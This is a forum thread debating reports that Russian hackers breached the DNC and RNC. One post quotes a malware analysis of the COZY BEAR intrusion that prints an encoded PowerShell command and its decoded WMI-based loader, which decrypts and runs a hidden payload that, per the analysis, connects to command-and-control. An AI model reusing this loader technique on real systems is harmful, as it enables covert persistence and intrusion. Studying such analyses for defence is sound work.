It looks like you're using an Ad Blocker.
Please white-list or disable AboveTopSecret.com in your ad-blocking tool.
Some features of ATS will be disabled while you continue to use an ad-blocker.
Intelligence agencies conclude that Republicans were also targeted ahead of election, The New York Times says, though motivation remains unclear
“We now have high confidence that they hacked the DNC and the RNC, and conspicuously released no documents” from the Republican organization, one senior administration official told The New York Times, referring to hackers allegedly working for the Russian government.
Rep. Michael McCaul, the Texas Republican who is the chairman of the House Homeland Security Committee, who said on CNN in September that the RNC had been hacked by Russia, but then quickly withdrew the claim.
McCaul initially told CNN’s Wolf Blitzer “It’s important to note, Wolf, that they have not only hacked into the DNC but also into the RNC.” He added that “the Russians have basically hacked into both parties at the national level, and that gives us all concern about what their motivations are.”
Minutes later, the RNC issued a statement denying that it had been hacked. McCaul subsequently said that he had misspoken, but that it was true that “Republican political operatives” had been the target of Russian hacking. So were establishment Republicans with no ties to the campaign, including former Secretary of State Colin L. Powell.
originally posted by: IgnoranceIsntBlisss
They can't even prove the DNC was hacked by RUssia, so now we're to believe they know the RNC was too?
This makes me think FAKE NEWS!
At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached the network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the other. Instead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of identical credentials. While you would virtually never see Western intelligence agencies going after the same target without de-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s Hydra: Inside Russia’s Intelligence Services”, a recent paper from European Council on Foreign Relations, does an excellent job outlining the highly adversarial relationship between Russia’s main intelligence services – Федеральная Служба Безопасности (FSB), the primary domestic intelligence agency but one with also significant external collection and ‘active measures’ remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU. Not only do they have overlapping areas of responsibility, but also rarely share intelligence and even occasionally steal sources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the same victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual operations.
The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI) system, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule. The Powershell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated command setup to run persistently, such as:
powershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0A
This decodes to:
function perfCr($crTr, $data)[
$ret = $null
$ms = New-Object System.IO.MemoryStream
$cs = New-Object System.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$ret = $ms.ToArray()
function decrAes($encData, $key, $iv)
$ret = $null
$prov = New-Object System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
function sWP($cN, $pN, $aK, $aI)
if($cN -eq $null -or $pN -eq $null)[return $false]
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
if($ex -eq $null -or $ex -eq ”)
$aeK = [byte] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67)
sWP ‘Wmi’ ‘Wmi’ $aeK $aeI | Out-Null
This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.
originally posted by: Gothmog
a reply to: Kettu
Times Of Israel ? Really ? Yeah ...
You gettin as bad as bad as another poster I know....
Just put ANYTHING from ANYWHERE out there as long as it is anti-Right.
How bout a source like CNN , Fox , reporting that the CIA has found this out....
It doesnt exist
originally posted by: Voiceofthemajority
originally posted by: Kettu
one senior administration official told The New York Times
Another impeccably sourced story